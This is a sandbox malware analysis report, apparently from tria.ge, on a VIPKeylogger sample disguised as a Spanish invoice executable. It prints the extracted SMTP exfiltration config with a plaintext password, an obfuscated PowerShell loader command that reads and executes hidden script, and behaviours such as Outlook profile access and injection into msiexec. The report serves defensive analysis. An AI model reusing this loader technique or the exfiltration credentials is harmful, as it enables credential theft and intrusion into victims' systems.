Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
298s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28/11/2024, 17:33
Static task
static1
Behavioral task
behavioral1
Sample
FACTURA 5004.-28 11 2024.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
FACTURA 5004.-28 11 2024.exe
Resource
win10v2004-20241007-en
General
-
Target
FACTURA 5004.-28 11 2024.exe
-
Size
570KB
-
MD5
622129ae990e84785b59a7c49769f1a5
-
SHA1
691be4e876979b11ac60494ed026c780d7291e2e
-
SHA256
bc52c9be844b9640dd46be53fe57fa01135fbe1f570f87369690176e925ffa18
-
SHA512
a470d8c219bf126064fdfc96ec8855f4383b8ccc595cb5a2946b82a4635fca67f463f98359096611b4fde71a375176d084e82345ea4312f0f5205cc1960593f6
-
SSDEEP
12288:1kuic98di0vU+lTb4Tmp6mAWn6Ui+LOFLmySMpQKE:Nic9Yi+4Tmp6mN6+LOFyGnE
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 24 1480 msiexec.exe 26 1480 msiexec.exe 28 1480 msiexec.exe 30 1480 msiexec.exe 34 1480 msiexec.exe 37 1480 msiexec.exe 40 1480 msiexec.exe 52 1480 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 drive.google.com 24 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1480 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4148 powershell.exe 1480 msiexec.exe -
pid Process 4148 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FACTURA 5004.-28 11 2024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 1480 msiexec.exe 1480 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4148 powershell.exe Token: SeIncreaseQuotaPrivilege 4148 powershell.exe Token: SeSecurityPrivilege 4148 powershell.exe Token: SeTakeOwnershipPrivilege 4148 powershell.exe Token: SeLoadDriverPrivilege 4148 powershell.exe Token: SeSystemProfilePrivilege 4148 powershell.exe Token: SeSystemtimePrivilege 4148 powershell.exe Token: SeProfSingleProcessPrivilege 4148 powershell.exe Token: SeIncBasePriorityPrivilege 4148 powershell.exe Token: SeCreatePagefilePrivilege 4148 powershell.exe Token: SeBackupPrivilege 4148 powershell.exe Token: SeRestorePrivilege 4148 powershell.exe Token: SeShutdownPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeSystemEnvironmentPrivilege 4148 powershell.exe Token: SeRemoteShutdownPrivilege 4148 powershell.exe Token: SeUndockPrivilege 4148 powershell.exe Token: SeManageVolumePrivilege 4148 powershell.exe Token: 33 4148 powershell.exe Token: 34 4148 powershell.exe Token: 35 4148 powershell.exe Token: 36 4148 powershell.exe Token: SeDebugPrivilege 1480 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2760 wrote to memory of 4148 2760 FACTURA 5004.-28 11 2024.exe 83 PID 2760 wrote to memory of 4148 2760 FACTURA 5004.-28 11 2024.exe 83 PID 2760 wrote to memory of 4148 2760 FACTURA 5004.-28 11 2024.exe 83 PID 4148 wrote to memory of 1480 4148 powershell.exe 97 PID 4148 wrote to memory of 1480 4148 powershell.exe 97 PID 4148 wrote to memory of 1480 4148 powershell.exe 97 PID 4148 wrote to memory of 1480 4148 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FACTURA 5004.-28 11 2024.exe"C:\Users\Admin\AppData\Local\Temp\FACTURA 5004.-28 11 2024.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Angerfuldt26=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Desorienteringen.Gri';$Onomatopoeic=$Angerfuldt26.SubString(80888,3);.$Onomatopoeic($Angerfuldt26)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1480
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
79KB
MD5945fccd53ead187a90304ff0aedb1b68
SHA1b53854db3b44513130206e2947b8dc9d3a094d00
SHA25606e5dfaa0b7147cd6ad61bc33525870d4d8997a03f4db825c1d1827741239656
SHA512d2a83d97d20d98135dc292c5deb7d150f330be75e7cbca418e3e2e843c4033f4683fce3d8ced513d3faf0c28b527dac858774c9bfef7283db31562a42915540b
-
Filesize
318KB
MD530c8540b24d269dc518e232e26189c6f
SHA1a2aca215aa58411cbf2a0450cde9de176501f430
SHA256945426b3266f9ebb9b61fe71e22406b62f6f86b8393a56b4770858ad7c04379b
SHA5125d223719a445ee75da2da4d8e0693604ad467ea1c295cdfdfef5369b79cb3aaacb15b8d08af55879b52e029665cf7ea94e1aa080cec880bc86bee274a1fbb0fa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82